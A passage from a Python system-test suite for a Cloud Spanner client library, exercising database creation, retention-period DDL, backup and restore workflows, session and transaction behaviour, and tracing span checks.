with self.assertRaises(exceptions.InvalidArgument):
temp_db.create()
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_create_database_pitr_success(self):
pool = BurstyPool(labels={"testcase": "create_database_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
ddl_statements = [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
temp_db = Config.INSTANCE.database(
temp_db_id, pool=pool, ddl_statements=ddl_statements
)
operation = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
operation.result(30) # raises on failure / timeout.
database_ids = [database.name for database in Config.INSTANCE.list_databases()]
self.assertIn(temp_db.name, database_ids)
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
with temp_db.snapshot() as snapshot:
results = snapshot.execute_sql(
"SELECT OPTION_VALUE AS version_retention_period "
"FROM INFORMATION_SCHEMA.DATABASE_OPTIONS "
"WHERE SCHEMA_NAME = '' AND OPTION_NAME = 'version_retention_period'"
)
for result in results:
self.assertEqual(result[0], retention_period)
def test_table_not_found(self):
temp_db_id = "temp_db" + unique_resource_id("_")
correct_table = "MyTable"
incorrect_table = "NotMyTable"
self.assertNotEqual(correct_table, incorrect_table)
create_table = (
"CREATE TABLE {} (\n"
" Id STRING(36) NOT NULL,\n"
" Field1 STRING(36) NOT NULL\n"
") PRIMARY KEY (Id)"
).format(correct_table)
index = "CREATE INDEX IDX ON {} (Field1)".format(incorrect_table)
temp_db = Config.INSTANCE.database(
temp_db_id, ddl_statements=[create_table, index]
)
self.to_delete.append(temp_db)
with self.assertRaises(exceptions.NotFound):
temp_db.create()
@unittest.skip(
(
"update_dataset_ddl() has a flaky timeout"
"https://github.com/GoogleCloudPlatform/google-cloud-python/issues/"
"5629"
)
)
def test_update_database_ddl_with_operation_id(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl"})
temp_db_id = "temp_db" + unique_resource_id("_")
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
# random but shortish always start with letter
operation_id = "a" + str(uuid.uuid4())[:8]
operation = temp_db.update_ddl(ddl_statements, operation_id=operation_id)
self.assertEqual(operation_id, operation.operation.name.split("/")[-1])
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_invalid(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "0d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
with self.assertRaises(exceptions.InvalidArgument):
temp_db.update_ddl(ddl_statements)
@unittest.skipIf(
USE_EMULATOR, "PITR-lite features are not supported by the emulator"
)
def test_update_database_ddl_pitr_success(self):
pool = BurstyPool(labels={"testcase": "update_database_ddl_pitr"})
temp_db_id = "temp_db" + unique_resource_id("_")
retention_period = "7d"
temp_db = Config.INSTANCE.database(temp_db_id, pool=pool)
create_op = temp_db.create()
self.to_delete.append(temp_db)
# We want to make sure the operation completes.
create_op.result(240) # raises on failure / timeout.
self.assertIsNone(temp_db.version_retention_period)
ddl_statements = DDL_STATEMENTS + [
"ALTER DATABASE {}"
" SET OPTIONS (version_retention_period = '{}')".format(
temp_db_id, retention_period
)
]
operation = temp_db.update_ddl(ddl_statements)
# We want to make sure the operation completes.
operation.result(240) # raises on failure / timeout.
temp_db.reload()
self.assertEqual(temp_db.version_retention_period, retention_period)
self.assertEqual(len(temp_db.ddl_statements), len(ddl_statements))
def test_db_batch_insert_then_db_snapshot_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
from_snap = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(from_snap)
def test_db_run_in_transaction_then_snapshot_execute_sql(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
rows = list(transaction.read(test.TABLE, test.COLUMNS, self.ALL))
test.assertEqual(rows, [])
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
def _unit_of_work(transaction, test):
transaction.insert_or_update(test.TABLE, test.COLUMNS, test.ROW_DATA)
self._db.run_in_transaction(_unit_of_work, test=self)
self._db.run_in_transaction(_unit_of_work, test=self)
with self._db.snapshot() as after:
rows = list(after.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_db_run_in_transaction_twice_4181(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(COUNTERS_TABLE, self.ALL)
def _unit_of_work(transaction, name):
transaction.insert(COUNTERS_TABLE, COUNTERS_COLUMNS, [[name, 0]])
self._db.run_in_transaction(_unit_of_work, name="id_1")
with self.assertRaises(exceptions.AlreadyExists):
self._db.run_in_transaction(_unit_of_work, name="id_1")
self._db.run_in_transaction(_unit_of_work, name="id_2")
with self._db.snapshot() as after:
rows = list(after.read(COUNTERS_TABLE, COUNTERS_COLUMNS, self.ALL))
self.assertEqual(len(rows), 2)
@unittest.skipIf(USE_EMULATOR, "Skipping backup tests")
@unittest.skipIf(SKIP_BACKUP_TESTS, "Skipping backup tests")
class TestBackupAPI(unittest.TestCase, _TestData):
DATABASE_NAME = "test_database" + unique_resource_id("_")
DATABASE_NAME_2 = "test_database2" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
from datetime import datetime
pool = BurstyPool(labels={"testcase": "database_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
db1 = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
db2 = Config.INSTANCE.database(cls.DATABASE_NAME_2, pool=pool)
cls._db = db1
cls._dbs = [db1, db2]
op1 = db1.create()
op2 = db2.create()
op1.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
op2.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS) # raises on failure / timeout.
cls.database_version_time = datetime.utcnow().replace(tzinfo=UTC)
current_config = Config.INSTANCE.configuration_name
same_config_instance_id = "same-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._same_config_instance = Config.CLIENT.instance(
same_config_instance_id, current_config, labels=labels
)
op = cls._same_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances = [cls._same_config_instance]
retry = RetryErrors(exceptions.ServiceUnavailable)
configs = list(retry(Config.CLIENT.list_instance_configs)())
diff_configs = [
config.name
for config in configs
if "-us-" in config.name and config.name is not current_config
]
cls._diff_config_instance = None
if len(diff_configs) > 0:
diff_config_instance_id = "diff-config" + unique_resource_id("-")
create_time = str(int(time.time()))
labels = {"python-spanner-systests": "true", "created": create_time}
cls._diff_config_instance = Config.CLIENT.instance(
diff_config_instance_id, diff_configs[0], labels=labels
)
op = cls._diff_config_instance.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
cls._instances.append(cls._diff_config_instance)
@classmethod
def tearDownClass(cls):
for db in cls._dbs:
db.drop()
for instance in cls._instances:
instance.delete()
def setUp(self):
self.to_delete = []
self.to_drop = []
def tearDown(self):
for doomed in self.to_delete:
doomed.delete()
for doomed in self.to_drop:
doomed.drop()
def test_create_invalid(self):
from datetime import datetime
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow()
expire_time = expire_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_backup_workflow(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=self.database_version_time,
)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertEqual(expire_time, backup.expire_time)
self.assertIsNotNone(backup.create_time)
self.assertEqual(self.database_version_time, backup.version_time)
self.assertIsNotNone(backup.size_bytes)
self.assertIsNotNone(backup.state)
# Update with valid argument.
valid_expire_time = datetime.utcnow() + timedelta(days=7)
valid_expire_time = valid_expire_time.replace(tzinfo=UTC)
backup.update_expire_time(valid_expire_time)
self.assertEqual(valid_expire_time, backup.expire_time)
# Restore database to same instance.
restored_id = "restored_db" + unique_resource_id("_")
database = instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
restored_db = operation.result()
self.assertEqual(
self.database_version_time,
restored_db.restore_info.backup_info.version_time,
)
metadata = operation.metadata
self.assertEqual(self.database_version_time, metadata.backup_info.version_time)
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_backup_version_time_defaults_to_create_time(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
instance = Config.INSTANCE
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = instance.backup(backup_id, database=self._db, expire_time=expire_time,)
operation = backup.create()
self.to_delete.append(backup)
# Check metadata.
metadata = operation.metadata
self.assertEqual(backup.name, metadata.name)
self.assertEqual(self._db.name, metadata.database)
operation.result()
# Check backup object.
backup.reload()
self.assertEqual(self._db.name, backup._database)
self.assertIsNotNone(backup.create_time)
self.assertEqual(backup.create_time, backup.version_time)
backup.delete()
self.assertFalse(backup.exists())
def test_create_backup_invalid_version_time_past(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() - timedelta(days=10)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_create_backup_invalid_version_time_future(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
version_time = datetime.utcnow() + timedelta(days=2)
version_time = version_time.replace(tzinfo=UTC)
backup = Config.INSTANCE.backup(
backup_id,
database=self._db,
expire_time=expire_time,
version_time=version_time,
)
with self.assertRaises(exceptions.InvalidArgument):
op = backup.create()
op.result()
def test_restore_to_diff_instance(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id = "backup_id" + unique_resource_id("_")
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
# Create backup.
backup = Config.INSTANCE.backup(
backup_id, database=self._db, expire_time=expire_time
)
op = backup.create()
self.to_delete.append(backup)
op.result()
# Restore database to different instance with same config.
restored_id = "restored_db" + unique_resource_id("_")
database = self._same_config_instance.database(restored_id)
self.to_drop.append(database)
operation = database.restore(source=backup)
operation.result()
database.drop()
backup.delete()
self.assertFalse(backup.exists())
def test_multi_create_cancel_update_error_restore_errors(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time = datetime.utcnow() + timedelta(days=3)
expire_time = expire_time.replace(tzinfo=UTC)
backup1 = instance.backup(
backup_id_1, database=self._dbs[0], expire_time=expire_time
)
backup2 = instance.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time
)
# Create two backups.
op1 = backup1.create()
op2 = backup2.create()
self.to_delete.extend([backup1, backup2])
backup1.reload()
self.assertFalse(backup1.is_ready())
backup2.reload()
self.assertFalse(backup2.is_ready())
# Cancel a create operation.
op2.cancel()
self.assertTrue(op2.cancelled())
op1.result()
backup1.reload()
self.assertTrue(backup1.is_ready())
# Update expire time to invalid value.
invalid_expire_time = datetime.now() + timedelta(days=366)
invalid_expire_time = invalid_expire_time.replace(tzinfo=UTC)
with self.assertRaises(exceptions.InvalidArgument):
backup1.update_expire_time(invalid_expire_time)
# Restore to existing database.
with self.assertRaises(exceptions.AlreadyExists):
self._db.restore(source=backup1)
# Restore to instance with different config.
if self._diff_config_instance is not None:
return
new_db = self._diff_config_instance.database("diff_config")
op = new_db.create()
op.result(SPANNER_OPERATION_TIMEOUT_IN_SECONDS)
self.to_drop.append(new_db)
with self.assertRaises(exceptions.InvalidArgument):
new_db.restore(source=backup1)
def test_list_backups(self):
from datetime import datetime
from datetime import timedelta
from pytz import UTC
backup_id_1 = "backup_id1" + unique_resource_id("_")
backup_id_2 = "backup_id2" + unique_resource_id("_")
instance = Config.INSTANCE
expire_time_1 = datetime.utcnow() + timedelta(days=21)
expire_time_1 = expire_time_1.replace(tzinfo=UTC)
backup1 = Config.INSTANCE.backup(
backup_id_1,
database=self._dbs[0],
expire_time=expire_time_1,
version_time=self.database_version_time,
)
expire_time_2 = datetime.utcnow() + timedelta(days=1)
expire_time_2 = expire_time_2.replace(tzinfo=UTC)
backup2 = Config.INSTANCE.backup(
backup_id_2, database=self._dbs[1], expire_time=expire_time_2
)
# Create two backups.
op1 = backup1.create()
op1.result()
backup1.reload()
create_time_compare = datetime.utcnow().replace(tzinfo=UTC)
backup2.create()
self.to_delete.extend([backup1, backup2])
# List backups filtered by state.
filter_ = "state:CREATING"
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by backup name.
filter_ = "name:{0}".format(backup_id_1)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by database name.
filter_ = "database:{0}".format(self._dbs[0].name)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by create time.
filter_ = 'create_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by version time.
filter_ = 'version_time > "{0}"'.format(
create_time_compare.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups filtered by expire time.
filter_ = 'expire_time > "{0}"'.format(
expire_time_1.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup1.name)
# List backups filtered by size bytes.
filter_ = "size_bytes < {0}".format(backup1.size_bytes)
for backup in instance.list_backups(filter_=filter_):
self.assertEqual(backup.name, backup2.name)
# List backups using pagination.
count = 0
for page in instance.list_backups(page_size=1):
count += 1
self.assertEqual(count, 2)
SOME_DATE = datetime.date(2011, 1, 17)
SOME_TIME = datetime.datetime(1989, 1, 17, 17, 59, 12, 345612)
NANO_TIME = DatetimeWithNanoseconds(1995, 8, 31, nanosecond=987654321)
POS_INF = float("+inf")
NEG_INF = float("-inf")
(OTHER_NAN,) = struct.unpack("<d", b"\x01\x00\x01\x00\x00\x00\xf8\xff")
BYTES_1 = b"Ymlu"
BYTES_2 = b"Ym9vdHM="
NUMERIC_1 = decimal.Decimal("0.123456789")
NUMERIC_2 = decimal.Decimal("1234567890")
ALL_TYPES_TABLE = "all_types"
ALL_TYPES_COLUMNS = (
"pkey",
"int_value",
"int_array",
"bool_value",
"bool_array",
"bytes_value",
"bytes_array",
"date_value",
"date_array",
"float_value",
"float_array",
"string_value",
"string_array",
"timestamp_value",
"timestamp_array",
"numeric_value",
"numeric_array",
)
EMULATOR_ALL_TYPES_COLUMNS = ALL_TYPES_COLUMNS[:-2]
AllTypesRowData = collections.namedtuple("AllTypesRowData", ALL_TYPES_COLUMNS)
AllTypesRowData.__new__.__defaults__ = tuple([None for colum in ALL_TYPES_COLUMNS])
EmulatorAllTypesRowData = collections.namedtuple(
"EmulatorAllTypesRowData", EMULATOR_ALL_TYPES_COLUMNS
)
EmulatorAllTypesRowData.__new__.__defaults__ = tuple(
[None for colum in EMULATOR_ALL_TYPES_COLUMNS]
)
ALL_TYPES_ROWDATA = (
# all nulls
AllTypesRowData(pkey=0),
# Non-null values
AllTypesRowData(pkey=101, int_value=123),
AllTypesRowData(pkey=102, bool_value=False),
AllTypesRowData(pkey=103, bytes_value=BYTES_1),
AllTypesRowData(pkey=104, date_value=SOME_DATE),
AllTypesRowData(pkey=105, float_value=1.4142136),
AllTypesRowData(pkey=106, string_value=u"VALUE"),
AllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
AllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
AllTypesRowData(pkey=109, numeric_value=NUMERIC_1),
# empty array values
AllTypesRowData(pkey=201, int_array=[]),
AllTypesRowData(pkey=202, bool_array=[]),
AllTypesRowData(pkey=203, bytes_array=[]),
AllTypesRowData(pkey=204, date_array=[]),
AllTypesRowData(pkey=205, float_array=[]),
AllTypesRowData(pkey=206, string_array=[]),
AllTypesRowData(pkey=207, timestamp_array=[]),
AllTypesRowData(pkey=208, numeric_array=[]),
# non-empty array values, including nulls
AllTypesRowData(pkey=301, int_array=[123, 456, None]),
AllTypesRowData(pkey=302, bool_array=[True, False, None]),
AllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
AllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
AllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
AllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
AllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
AllTypesRowData(pkey=308, numeric_array=[NUMERIC_1, NUMERIC_2, None]),
)
EMULATOR_ALL_TYPES_ROWDATA = (
# all nulls
EmulatorAllTypesRowData(pkey=0),
# Non-null values
EmulatorAllTypesRowData(pkey=101, int_value=123),
EmulatorAllTypesRowData(pkey=102, bool_value=False),
EmulatorAllTypesRowData(pkey=103, bytes_value=BYTES_1),
EmulatorAllTypesRowData(pkey=104, date_value=SOME_DATE),
EmulatorAllTypesRowData(pkey=105, float_value=1.4142136),
EmulatorAllTypesRowData(pkey=106, string_value=u"VALUE"),
EmulatorAllTypesRowData(pkey=107, timestamp_value=SOME_TIME),
EmulatorAllTypesRowData(pkey=108, timestamp_value=NANO_TIME),
# empty array values
EmulatorAllTypesRowData(pkey=201, int_array=[]),
EmulatorAllTypesRowData(pkey=202, bool_array=[]),
EmulatorAllTypesRowData(pkey=203, bytes_array=[]),
EmulatorAllTypesRowData(pkey=204, date_array=[]),
EmulatorAllTypesRowData(pkey=205, float_array=[]),
EmulatorAllTypesRowData(pkey=206, string_array=[]),
EmulatorAllTypesRowData(pkey=207, timestamp_array=[]),
# non-empty array values, including nulls
EmulatorAllTypesRowData(pkey=301, int_array=[123, 456, None]),
EmulatorAllTypesRowData(pkey=302, bool_array=[True, False, None]),
EmulatorAllTypesRowData(pkey=303, bytes_array=[BYTES_1, BYTES_2, None]),
EmulatorAllTypesRowData(pkey=304, date_array=[SOME_DATE, None]),
EmulatorAllTypesRowData(pkey=305, float_array=[3.1415926, 2.71828, None]),
EmulatorAllTypesRowData(pkey=306, string_array=[u"One", u"Two", None]),
EmulatorAllTypesRowData(pkey=307, timestamp_array=[SOME_TIME, NANO_TIME, None]),
)
class TestSessionAPI(OpenTelemetryBase, _TestData):
DATABASE_NAME = "test_sessions" + unique_resource_id("_")
@classmethod
def setUpClass(cls):
pool = BurstyPool(labels={"testcase": "session_api"})
ddl_statements = EMULATOR_DDL_STATEMENTS if USE_EMULATOR else DDL_STATEMENTS
cls._db = Config.INSTANCE.database(
cls.DATABASE_NAME, ddl_statements=ddl_statements, pool=pool
)
operation = cls._db.create()
operation.result(
SPANNER_OPERATION_TIMEOUT_IN_SECONDS
) # raises on failure / timeout.
@classmethod
def tearDownClass(cls):
cls._db.drop()
def setUp(self):
super(TestSessionAPI, self).setUp()
self.to_delete = []
def tearDown(self):
super(TestSessionAPI, self).tearDown()
for doomed in self.to_delete:
doomed.delete()
def test_session_crud(self):
retry_true = RetryResult(operator.truth)
retry_false = RetryResult(operator.not_)
session = self._db.session()
self.assertFalse(session.exists())
session.create()
retry_true(session.exists)()
session.delete()
retry_false(session.exists)()
def test_batch_insert_then_read(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
batch.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 4)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 2}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"columns": self.COLUMNS,
"table_id": self.TABLE,
}
),
span=span_list[3],
)
def test_batch_insert_then_read_string_array_of_string(self):
table = "string_plus_array_of_string"
columns = ["id", "name", "tags"]
rowdata = [
(0, None, None),
(1, "phred", ["yabba", "dabba", "do"]),
(2, "bharney", []),
(3, "wylma", ["oh", None, "phred"]),
]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self._check_rows_data(rows, expected=rowdata)
def test_batch_insert_then_read_all_datatypes(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
if USE_EMULATOR:
all_types_columns = EMULATOR_ALL_TYPES_COLUMNS
all_types_rowdata = EMULATOR_ALL_TYPES_ROWDATA
else:
all_types_columns = ALL_TYPES_COLUMNS
all_types_rowdata = ALL_TYPES_ROWDATA
with self._db.batch() as batch:
batch.delete(ALL_TYPES_TABLE, self.ALL)
batch.insert(ALL_TYPES_TABLE, all_types_columns, all_types_rowdata)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(ALL_TYPES_TABLE, all_types_columns, self.ALL))
self._check_rows_data(rows, expected=all_types_rowdata)
def test_batch_insert_or_update_then_query(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.execute_sql(self.SQL))
self._check_rows_data(rows)
def test_batch_insert_w_commit_timestamp(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
table = "users_history"
columns = ["id", "commit_ts", "name", "email", "deleted"]
user_id = 1234
name = "phred"
email = "[email protected]"
row_data = [[user_id, COMMIT_TIMESTAMP, name, email, False]]
with self._db.batch() as batch:
batch.delete(table, self.ALL)
batch.insert(table, columns, row_data)
with self._db.snapshot(read_timestamp=batch.committed) as snapshot:
rows = list(snapshot.read(table, columns, self.ALL))
self.assertEqual(len(rows), 1)
r_id, commit_ts, r_name, r_email, deleted = rows[0]
self.assertEqual(r_id, user_id)
self.assertEqual(commit_ts, batch.committed)
self.assertEqual(r_name, name)
self.assertEqual(r_email, email)
self.assertFalse(deleted)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Aborted)
def test_transaction_read_and_insert_then_rollback(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
transaction = session.transaction()
transaction.begin()
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.rollback()
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
if HAS_OPENTELEMETRY_INSTALLED:
span_list = self.memory_exporter.get_finished_spans()
self.assertEqual(len(span_list), 8)
self.assertSpanAttributes(
"CloudSpanner.CreateSession",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[0],
)
self.assertSpanAttributes(
"CloudSpanner.GetSession",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "session_found": True}
),
span=span_list[1],
)
self.assertSpanAttributes(
"CloudSpanner.Commit",
attributes=dict(
BASE_ATTRIBUTES,
**{"db.instance": self._db.name, "num_mutations": 1}
),
span=span_list[2],
)
self.assertSpanAttributes(
"CloudSpanner.BeginTransaction",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[3],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[4],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[5],
)
self.assertSpanAttributes(
"CloudSpanner.Rollback",
attributes=dict(BASE_ATTRIBUTES, **{"db.instance": self._db.name}),
span=span_list[6],
)
self.assertSpanAttributes(
"CloudSpanner.ReadOnlyTransaction",
attributes=dict(
BASE_ATTRIBUTES,
**{
"db.instance": self._db.name,
"table_id": self.TABLE,
"columns": self.COLUMNS,
}
),
span=span_list[7],
)
def _transaction_read_then_raise(self, transaction):
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(len(rows), 0)
transaction.insert(self.TABLE, self.COLUMNS, self.ROW_DATA)
raise CustomException()
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_then_exception(self):
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
with self._db.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with self.assertRaises(CustomException):
self._db.run_in_transaction(self._transaction_read_then_raise)
# Transaction was rolled back.
with self._db.snapshot() as snapshot:
rows = list(snapshot.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_read_and_insert_or_update_then_commit(self):
# [START spanner_test_dml_read_your_writes]
retry = RetryInstanceState(_has_all_ddl)
retry(self._db.reload)()
session = self._db.session()
session.create()
self.to_delete.append(session)
with session.batch() as batch:
batch.delete(self.TABLE, self.ALL)
with session.transaction() as transaction:
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
transaction.insert_or_update(self.TABLE, self.COLUMNS, self.ROW_DATA)
# Inserted rows can't be read until after commit.
rows = list(transaction.read(self.TABLE, self.COLUMNS, self.ALL))
self.assertEqual(rows, [])
rows = list(session.read(self.TABLE, self.COLUMNS, self.ALL))
self._check_rows_data(rows)
# [END spanner_test_dml_read_your_writes]
def _generate_insert_statements(self):
insert_template = "INSERT INTO {table} ({column_list}) " "VALUES ({row_data})"
for row in self.ROW_DATA:
yield insert_template.format(
table=self.TABLE,
column_list=", ".join(self.COLUMNS),
row_data='{}, "{}", "{}", "{}"'.format(*row),
)
@RetryErrors(exception=exceptions.ServerError)
@RetryErrors(exception=exceptions.Conflict)
def test_transaction_execute_sql_w_dml_read_rollback(self):
